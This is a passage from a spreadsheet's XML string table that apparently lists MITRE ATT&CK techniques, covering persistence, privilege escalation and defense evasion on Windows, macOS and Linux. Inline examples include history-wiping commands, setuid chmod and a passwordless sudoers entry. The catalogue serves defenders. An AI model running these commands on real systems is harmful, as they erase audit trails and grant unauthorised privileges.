  <si>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</si>
  <si>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</si>
  <si>
    <t>Windows Admin Shares</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1028</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>T1004</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <r>
      <t>~/.bash_profile</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bashrc</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bash_profile</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is executed for login shells and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bashrc</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bash_profile</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bashrc</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is executed. This allows users more fine grained control over when they want certain commands executed.</t>
    </r>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>runas</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> are loaded into every process that calls the ubiquitously used application programming interface (API) functions:</t>
    </r>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>osalang</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> program.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>.bash_history</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> file. For each user, this file resides at the same location: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bash_history</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <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r>
  </si>
  <si>
    <r>
      <t>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HISTFILE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. When a user logs off a system, this information is flushed to a file in the user's home directory called </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bash_history</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>unset HISTFILE</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>export HISTFILESIZE=0</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>history -c</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>rm ~/.bash_history</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>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</si>
  <si>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Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted.</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</si>
  <si>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t>
  </si>
  <si>
    <r>
      <t>In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>com.apple.quarantine</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.</t>
    </r>
  </si>
  <si>
    <t>The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as Remote Desktop Protocol, instead of through a Command-Line Interface, to search for information and execute files via mouse double-click events, the Windows Run command , or other potentially difficult to monitor interactions.</t>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>dir /a</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for Windows and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>ls –a</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> for Linux and macOS).</t>
    </r>
  </si>
  <si>
    <r>
      <t>The configurations for how applications run on macOS and OS X are listed in property list (plist) files. One of the tags in these files can be </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>apple.awt.UIElement</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window .</t>
    </r>
  </si>
  <si>
    <r>
      <t>The </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HISTCONTROL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> environment variable keeps track of what should be saved by the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>history</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command and eventually into the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/.bash_history</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HISTCONTROL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HISTCONTROL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</t>
    </r>
  </si>
  <si>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t>
  </si>
  <si>
    <r>
      <t>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. InstallUtil is located in the .NET directories on a Windows system: </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. InstallUtil.exe is digitally signed by Microsoft.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/Library/Keychains/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/Library/Keychains/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/Network/Library/Keychains/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>security</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/System/Library/LaunchAgents</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/Library/LaunchAgents</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>$HOME/Library/LaunchAgents</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> . These launch agents have property list files which point to the executables that will be launched .</t>
    </r>
  </si>
  <si>
    <r>
      <t>Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/System/Library/LaunchDaemons</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/Library/LaunchDaemons</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> . These LaunchDaemons have property list files which point to the executables that will be launched .</t>
    </r>
  </si>
  <si>
    <r>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 Running a command from launchctl is as simple as </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg"</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>.hta</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SOFTWARE\Microsoft\Netsh</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>net use \system\share /delete</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command.</t>
    </r>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/Library/Preferences</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> (which execute with elevated privileges) and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/Library/Preferences</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> (which execute with a user's privileges).</t>
    </r>
  </si>
  <si>
    <r>
      <t>A port monitor can be set through the API call to set a DLL to be loaded at startup. This DLL can be located in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The Registry key contains entries for the following:</t>
    </r>
  </si>
  <si>
    <r>
      <t>During the boot process, macOS executes </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>source /etc/rc.common</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts . In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.</t>
    </r>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/Library/Preferences/com.apple.loginwindow.plist</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>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 to use External Remote Services such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.</t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>
    <r>
      <t>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. The Windows screensaver application scrnsave.exe is located in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>C:\Windows\System32\</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKCU\Control Panel\Desktop\</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>) and could be manipulated to achieve persistence:</t>
    </r>
  </si>
  <si>
    <r>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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.</t>
    </r>
  </si>
  <si>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</si>
  <si>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r>
      <t>When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively .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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>ls -l</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>chmod</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> program can set these bits with via bitmasking, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>chmod 4777 [file]</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or via shorthand naming, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>chmod u+s [file]</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>The </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>source</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>source /path/to/filename [arguments]</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>. /path/to/filename [arguments]</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Take note of the space after the ".". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items . This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/Library/StartupItems</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>StartupParameters.plist</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, reside in the top-level directory.</t>
    </r>
  </si>
  <si>
    <r>
      <t>The sudoers file, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/etc/sudoers</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <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t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>user1 ALL=(ALL) NOPASSWD: ALL</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> .</t>
    </r>
  </si>
  <si>
    <r>
      <t>The </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>sudo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." Since sudo was made for the system administrator, it has some useful configuration features such as a </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>timestamp_timeout</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> that is the amount of time in minutes between instances of </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>sudo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> before it will re-prompt for a password. This is because </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>sudo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Courier"/>
        <family val="3"/>
      </rPr>
      <t>/var/db/sudo</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
